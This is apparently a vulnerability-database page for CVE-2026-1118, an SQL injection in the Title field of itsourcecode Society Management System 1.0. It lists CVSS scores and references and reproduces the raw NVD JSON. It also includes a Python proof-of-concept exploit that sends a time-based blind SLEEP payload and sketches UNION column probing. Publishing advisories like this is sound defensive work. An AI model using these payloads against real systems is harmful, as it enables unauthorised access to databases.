CVE-2026-1118

Description

A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Society Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1118 SQL Injection PoC
# Target: itsourcecode Society Management System 1.0
# Endpoint: /admin/add_activity.php
# Vulnerable Parameter: Title

TARGET_URL = "http://target-site.com/admin/add_activity.php"

def exploit_sql_injection():
    """
    SQL Injection exploit for CVE-2026-1118
    This PoC demonstrates blind SQL injection in the Title parameter
    """
    
    # Basic authentication for low-privilege admin account
    auth = ('lowpriv_user', 'password')
    
    # SQL Injection payload - extracts database version
    # Using time-based blind injection technique
    payload = "'+(SELECT*FROM(SELECT(SLEEP(5)))a)+'"
    
    data = {
        'Title': payload,
        'Description': 'Test Activity',
        'Date': '2026-01-18',
        'submit': 'Add'
    }
    
    try:
        print(f"[*] Sending exploit request to {TARGET_URL}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(TARGET_URL, data=data, auth=auth, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[+] SQL Injection confirmed! Server response delayed by 5 seconds.")
            print(f"[+] Database version could be extracted using similar techniques.")
        else:
            print("[-] Exploit failed or target not vulnerable.")
            
    except requests.exceptions.Timeout:
        print("[+] SQL Injection confirmed! Request timed out as expected.")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

def union_based_injection():
    """
    UNION-based SQL injection to extract database information
    """
    # Determine number of columns (typically 1-10)
    for i in range(1, 11):
        payload = f"' UNION SELECT {','.join(['1']*i)}-- "
        # Send request and analyze response
        print(f"[*] Testing {i} columns...")

if __name__ == "__main__":
    print("CVE-2026-1118 SQL Injection PoC")
    print("=" * 50)
    exploit_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1118
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1118
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1118/
[4] VulDB https://vuldb.com/cve/CVE-2026-1118
[5] https://github.com/AriazzzZ/CVE/issues/2
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.341710
[8] https://vuldb.com/?id.341710
[9] https://vuldb.com/?submit.734289

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1118", "sourceIdentifier": "[email protected]", "published": "2026-01-18T11:15:48.860", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is an unknown function of the file /admin/add_activity.php. Performing a manipulation of the argument Title results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en itsourcecode Society Management System 1.0. Afectada es una función desconocida del archivo /admin/add_activity.php. Realizar una manipulación del argumento Title resulta en inyección SQL. Es posible iniciar el ataque de forma remota. El exploit ya es público y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:society_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "99B926B0-DB28-4E1F-8F49-489C73C35F36"}]}]}], "references": [{"url": "https://github.com/AriazzzZ/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.341710", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341710", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.734289", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}